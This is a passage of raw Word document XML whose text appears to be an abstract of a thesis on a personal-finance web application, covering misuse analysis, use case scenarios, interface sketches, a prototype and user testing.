        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misused</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>later</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>possible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to design </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avoiding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thanks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>depth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487D3E" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>solution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>problem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suggested</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functionality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>developed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in detail in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>individual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scenarios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user interface </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>designed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sketches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scenarios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requirements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. These </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sketches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>validate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>required</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functionality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487D3E" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>combination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>technologies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>implement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prototype </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>implements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> most </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>important</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scenarios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suggested</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> technology </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>selection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487D3E" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prototype </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on a sample </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Such </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>planned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>correctness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>entire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>solution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>few</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drawbacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>during</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>before</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>itself</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>validated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a positive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>All</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agreed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>they</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>their</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>finances</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21ACF" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thoughts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>further</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expansion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
